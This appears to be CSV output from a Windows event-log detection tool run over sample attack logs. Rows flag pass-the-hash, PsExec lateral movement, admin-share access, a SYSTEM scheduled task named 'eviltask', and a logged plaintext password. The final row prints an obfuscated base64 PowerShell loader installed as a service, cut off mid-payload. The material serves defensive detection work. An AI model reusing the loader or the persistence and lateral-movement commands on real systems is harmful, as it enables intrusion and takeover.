| User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x76073 | PID: 7280 | PGUID: 747F3D96-3A77-607F-0000-00105DD17600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:00.296 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:00.306 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\samir | Process: System | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\user03 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile | LID: 0x770575 | PID: 2740 | PGUID: 747F3D96-3A7C-607F-0000-001058067700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 127.0.0.1:49925 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2532 | PGUID: 747F3D96-04C3-607F-0000-0010F13B1E00,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49925 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 4912 | PGUID: 747F3D96-3A89-607F-0000-001028587700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: 
C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 5280 | PGUID: 747F3D96-3A8A-607F-0000-0010E4717700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.860 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.17:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.861 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.17:137 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:18.296 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.3.15:137 (MSEDGEWIN10.home) | Dst: 10.0.3.255:137 () | User: | Process: | PID: 4 | PGUID: 
747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:18.296 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.3.255:137 () | Dst: 10.0.3.15:137 (MSEDGEWIN10.home) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:20.254 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49926 (MSEDGEWIN10) | Dst: 127.0.0.1:5357 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx +2021-04-21 18:27:56.082 +09:00,jump01.offsec.lan,7045,high,,PSExec Lateral Movement,Service: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_LateralMovement-PSEXEC.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx +2021-04-21 18:27:56.082 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | Account: LocalSystem | Start Type: 
demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx +2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: PSEXESVC.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: PSEXESVC.exe | IP Addr: 10.23.42.22 | LID: 
0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375fd8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375ff5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1376003,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1376020,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.363 
+09:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,Name: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1376020,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.364 +09:00,srvdefender01.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: PSEXESVC | User: admmig | LID: 0x1376020 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: cmd.exe | IP Addr: 
10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: cmd.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.531 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""cmd.exe"" -u demo\admmig -p Admin1235 
-accepteula | Path: C:\Windows\cmd.exe | PID: 0x15d4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:41:03.008 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x590 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:42:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1050 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:43:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf90 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 
PSexec remote execution + admin share.evtx" +2021-04-21 22:30:00.569 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\schtasks.exe"" /create /sc minute /mo 1 /tn eviltask /tr C:\tools\shell.cmd /ru SYSTEM | Path: C:\Windows\System32\schtasks.exe | PID: 0x15b4 | User: admmig | LID: 0x6fc89e",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx +2021-04-21 22:30:00.589 +09:00,srvdefender01.offsec.lan,4698,info,,Task Created,"Name: \eviltask | Content: 2021-04-21T13:30:00 OFFSEC\admmig \eviltask PT1M false 2021-04-21T13:30:00 true IgnoreNew true true true false false PT10M PT1H true false true true false false false PT72H 7 C:\tools\shell.cmd S-1-5-18 LeastPrivilege | User: admmig | LID: 0x6fc89e",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx +2021-04-21 22:30:03.012 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x2ac | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx +2021-04-21 23:56:41.780 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 
0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx +2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP 
Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx +2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,"Name: iOWamcEn | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadT